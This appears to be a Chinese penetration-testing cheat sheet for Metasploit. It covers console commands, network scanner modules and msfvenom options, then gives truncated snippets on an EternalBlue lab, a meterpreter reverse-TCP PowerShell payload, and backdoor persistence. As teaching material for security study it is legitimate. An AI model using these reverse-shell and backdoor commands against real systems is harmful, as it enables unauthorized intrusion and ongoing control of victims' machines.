一.檔案目錄
date目錄 儲存資料
documentation目錄 文件目錄
lib目錄 儲存ruby指令碼
modules目錄 儲存模組和外掛程式
tools目錄 儲存小工具
二.基礎使用
msfdb init 初始化並啟動資料庫
db_status 檢視資料庫狀態
msfconsole 控制台 (可以使用kage實現介面化)
help 幫助
exit 退出
show 進行羅列模板
search 搜尋模組名或cve編號
back 返回上一級
info 檢視模組具體資訊
show options 檢視需要配置的
set 進行設定屬性
exploit/run 進行執行
jobs 檢視後台執行的工作
kill +id號 停止job
三.收集資訊
auxiliary/scanner/discovery/arp_sweep arp掃瞄
auxiliary/scanner/discovery/udp_sweep udp掃瞄
auxiliary/scanner/portscan/tcp 埠掃瞄
還有許多的其他型別的掃瞄就不再多說了
四.msfvenom
msfvenom -l 檢視型別
msfvenom -l payloads 檢視所有payload
msfvenom -l archs 檢視所有架構
msfvenom -l format 檢視所有格式
msfvenom -p 指定payload格式
msfvenom -f 指定輸出格式
msfvenom -e 指定編碼方式
msfvenom -i 指定編碼次數 (注意要小於20)
內網滲透(msf 永恆之藍漏洞)
準備工具 一台kall虛擬機器 擁有msf 一台win7虛擬機器 先使用msf的永恆之藍掃瞄模組對區域網進行掃瞄,可以掃瞄出區域網內符合條件的計算機資訊。這裡先推薦用nmap掃瞄區域網的存活機後,直接指定ip掃瞄把,用這個模板直接掃瞄整個區域網實在是太浪費時間了。在掃瞄出有著永恆之藍漏洞的計算機後,...
msf反彈shell內網滲透
1.msfvenom p windows x64 meterpreter reverse tcp lhost 本機ip位址 lport 本機監聽埠 f psh reflection o xx.ps1 生成檔案放在目標機目錄下 powershell執行指令碼 powershell windowstyl...
內網滲透 許可權維持 MSF
msf路徑 usr share 製作後門 msfvenom windows示例 遠控流程 2.開啟msf並進入handle模組 3.設定payload型別 必須與第一步一致 4.設定lhost和lport 與第一步生成的後門一致 5.options檢視配置是否正確 6.run執行 bg將程序放到後台...